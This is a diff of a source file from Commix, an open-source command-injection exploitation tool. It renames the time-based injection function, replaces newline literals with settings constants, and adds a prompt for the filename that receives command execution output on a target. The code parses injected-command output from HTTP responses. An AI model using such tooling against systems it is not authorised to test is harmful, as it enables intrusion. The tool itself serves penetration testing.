@@ -3,7 +3,7 @@
 
 """
 This file is part of Commix Project (https://commixproject.com).
-Copyright (c) 2014-2024 Anastasios Stasinopoulos (@ancst).
+Copyright (c) 2014-2025 Anastasios Stasinopoulos (@ancst).
 
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
@@ -36,7 +36,7 @@ from src.thirdparty.colorama import Fore, Back, Style, init
 """
 The main time-realative command injection exploitation.
 """
-def time_relative_injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique):
+def time_related_injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique):
 
   if technique == settings.INJECTION_TECHNIQUE.TIME_BASED:
     from src.core.injections.blind.techniques.time_based import tb_payloads as payloads
@@ -113,7 +113,7 @@ def time_relative_injection(separator, maxlen, TAG, cmd, prefix, suffix, whitesp
     if settings.VERBOSITY_LEVEL == 0 :
       info_msg += ".. (" + str(percent) + ")"
     else:
-      info_msg +=  "\n"
+      info_msg +=  settings.END_LINE.LF
     if output_length > 1:
       settings.print_data_to_stdout(settings.END_LINE.CR + settings.print_info_msg(info_msg))
       
@@ -195,7 +195,7 @@ def results_based_injection(separator, TAG, cmd, prefix, suffix, whitespace, htt
     if settings.VERBOSITY_LEVEL != 0:
       _ = cmd
       if technique == settings.INJECTION_TECHNIQUE.FILE_BASED or technique == settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED:
-        payload_msg = payload.replace("\n", "\\n")
+        payload_msg = payload.replace(settings.END_LINE.LF, settings.END_LINE.ESCAPED_LF)
         if settings.COMMENT in payload_msg:
           payload = payload.split(settings.COMMENT)[0].strip()
           payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
@@ -322,6 +322,59 @@ def false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, timese
   else:
     checks.unexploitable_point()
 
+"""
+Prompt the user to confirm or set a custom filename for command execution output.
+Returns the chosen filename.
+"""
+def select_output_filename(technique, tmp_path, TAG):
+  # Ensure tmp_path ends with a slash for safe concatenation
+  if tmp_path and not tmp_path.endswith("/"):
+    tmp_path += "/"
+
+  # If a custom filename is already set, handle tmp_path prefix depending on technique
+  if settings.CUSTOM_FILENAME:
+    if technique == settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED:
+      if not settings.CUSTOM_FILENAME.startswith(tmp_path):
+        settings.CUSTOM_FILENAME = tmp_path + settings.CUSTOM_FILENAME
+    else:
+      # Remove tmp_path prefix if present but technique is different
+      if settings.CUSTOM_FILENAME.startswith(tmp_path):
+        settings.CUSTOM_FILENAME = settings.CUSTOM_FILENAME[len(tmp_path):]
+    return settings.CUSTOM_FILENAME
+
+  # Generate default filename
+  OUTPUT_TEXTFILE = TAG + settings.OUTPUT_FILE_EXT
+
+  while True:
+    message = "Do you want to use a random file '" + OUTPUT_TEXTFILE 
+    message += "' to receive the command execution output? [Y/n] > "
+    procced_option = common.read_input(message, default="Y", check_batch=True)
+
+    if procced_option in settings.CHOICE_YES:
+      break
+
+    elif procced_option in settings.CHOICE_NO:
+      message = "Enter a filename to receive the command execution output > "
+      message = common.read_input(message, default=OUTPUT_TEXTFILE, check_batch=True)
+
+      OUTPUT_TEXTFILE = message
+      info_msg = "Using '" + OUTPUT_TEXTFILE + "' for command execution output."
+      settings.print_data_to_stdout(settings.print_info_msg(info_msg))
+      break
+
+    elif procced_option in settings.CHOICE_QUIT:
+      raise SystemExit()
+
+    else:
+      common.invalid_option(procced_option)
+
+  # Prepend tmp_path if needed
+  if technique == settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED:
+    OUTPUT_TEXTFILE = tmp_path + OUTPUT_TEXTFILE
+
+  settings.CUSTOM_FILENAME = OUTPUT_TEXTFILE
+  return OUTPUT_TEXTFILE
+
 """
 Find the URL directory.
 """
@@ -353,7 +406,7 @@ def injection_output(url, OUTPUT_TEXTFILE, timesec, technique):
     settings.DEFINED_WEBROOT = output
     return output
 
-  if not settings.DEFINED_WEBROOT or settings.MULTI_TARGETS:
+  if not settings.DEFINED_WEBROOT or settings.MULTI_TARGETS or not settings.RECHECK_FILE_FOR_EXTRACTION:
     if menu.options.web_root:
       scheme = _urllib.parse.urlparse(url).scheme
       hostname = _urllib.parse.urlparse(url).hostname
@@ -363,15 +416,15 @@ def injection_output(url, OUTPUT_TEXTFILE, timesec, technique):
         if settings.MULTI_TARGETS:
           settings.RECHECK_FILE_FOR_EXTRACTION = True
         while True:
-          message =  "Do you want to use URL '" + output
-          message += "' for command execution output? [Y/n] > "
+          message =  "Do you want to use the URL '" + output
+          message += "' to receive the command execution output? [Y/n] > "
           procced_option = common.read_input(message, default="Y", check_batch=True)
           if procced_option in settings.CHOICE_YES:
             settings.DEFINED_WEBROOT = output
             break
           elif procced_option in settings.CHOICE_NO:
-            message =  "Enter URL to use "
-            message += "for command execution output > "
+            message =  "Enter URL to receive "
+            message += "the command execution output > "
             message = common.read_input(message, default=output, check_batch=True)
             if not re.search(r'^(?:http)s?://', message, re.I):
               common.invalid_option(message)
@@ -381,6 +434,7 @@ def injection_output(url, OUTPUT_TEXTFILE, timesec, technique):
               info_msg = "Using '" + output
               info_msg += "' for command execution output."
               settings.print_data_to_stdout(settings.print_info_msg(info_msg))
+              settings.RECHECK_FILE_FOR_EXTRACTION = True
               if not settings.DEFINED_WEBROOT:
                 pass
               else:
@@ -415,8 +469,8 @@ def injection_test_results(response, TAG, randvcalc, technique):
     except:  # Python 2
       unescape = _html_parser.HTMLParser().unescape
     # Check the execution results
-    html_data = checks.page_encoding(response, action="decode")
-    html_data = html_data.replace("\n",settings.SINGLE_WHITESPACE)
+    html_data = checks.process_page_content(response, action="decode")
+    html_data = html_data.replace(settings.END_LINE.LF,settings.SINGLE_WHITESPACE)
     # cleanup string / unescape html to string
     html_data = _urllib.parse.unquote(html_data)
     html_data = unescape(html_data)
@@ -429,8 +483,8 @@ def injection_test_results(response, TAG, randvcalc, technique):
     if len(shell) > 1:
       shell = shell[0]
   else:
-    html_data = checks.page_encoding(response, action="decode")
-    html_data = re.sub("\n", settings.SINGLE_WHITESPACE, html_data)
+    html_data = checks.process_page_content(response, action="decode")
+    html_data = re.sub(settings.END_LINE.LF, settings.SINGLE_WHITESPACE, html_data)
     if settings.SKIP_CALC:
       shell = re.findall(r"" + TAG + settings.SINGLE_WHITESPACE + TAG + settings.SINGLE_WHITESPACE + TAG + settings.SINGLE_WHITESPACE , html_data)
     else:
@@ -452,8 +506,8 @@ def injection_results(response, TAG, cmd, technique, url, OUTPUT_TEXTFILE, times
     false_result = False
     try:
       # Grab execution results
-      html_data = checks.page_encoding(response, action="decode")
-      html_data = html_data.replace("\n",settings.SINGLE_WHITESPACE)
+      html_data = checks.process_page_content(response, action="decode")
+      html_data = html_data.replace(settings.END_LINE.LF,settings.SINGLE_WHITESPACE)
       # cleanup string / unescape html to string
       html_data = _urllib.parse.unquote(html_data)
       html_data = unescape(html_data)
@@ -493,15 +547,15 @@ def injection_results(response, TAG, cmd, technique, url, OUTPUT_TEXTFILE, times
   elif technique == settings.INJECTION_TECHNIQUE.DYNAMIC_CODE:
     new_line = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
     # Grab execution results
-    html_data = checks.page_encoding(response, action="decode")
-    html_data = re.sub("\n", new_line, html_data)
+    html_data = checks.process_page_content(response, action="decode")
+    html_data = re.sub(settings.END_LINE.LF, new_line, html_data)
     shell = re.findall(r"" + TAG + new_line + TAG + "(.*)" + TAG + new_line + TAG + "", html_data)
     try:
       if len(re.split(TAG  + "(.*)" + TAG, shell[0])) != 0:
         shell = re.findall(r"" + new_line + "(.*)" + new_line + "", \
                            re.split(TAG  + "(.*)" + TAG, \
                            re.split(TAG  + "(.*)" + TAG, shell[0])[0])[0])
-      shell = shell[0].replace(new_line, "\n").rstrip().lstrip()
+      shell = shell[0].replace(new_line, settings.END_LINE.LF).rstrip().lstrip()
     except IndexError:
       pass
 
@@ -513,13 +567,13 @@ def injection_results(response, TAG, cmd, technique, url, OUTPUT_TEXTFILE, times
       shell = ""
     else:
       try:
-        shell = checks.page_encoding(response, action="encode").rstrip().lstrip()
-        #shell = [newline.replace("\n",settings.SINGLE_WHITESPACE) for newline in shell]
+        shell = checks.process_page_content(response, action="encode").rstrip().lstrip()
+        #shell = [newline.replace(settings.END_LINE.LF,settings.SINGLE_WHITESPACE) for newline in shell]
         if settings.TARGET_OS == settings.OS.WINDOWS:
           shell = [newline.replace(settings.END_LINE.CR, "") for newline in shell]
           #shell = [space.strip() for space in shell]
           shell = [empty for empty in shell if empty]
-      except _urllib.error.HTTPError as e:
+      except (_urllib.error.HTTPError, _urllib.error.URLError) as e:
         if str(e.getcode()) == settings.NOT_FOUND_ERROR:
           shell = ""
 
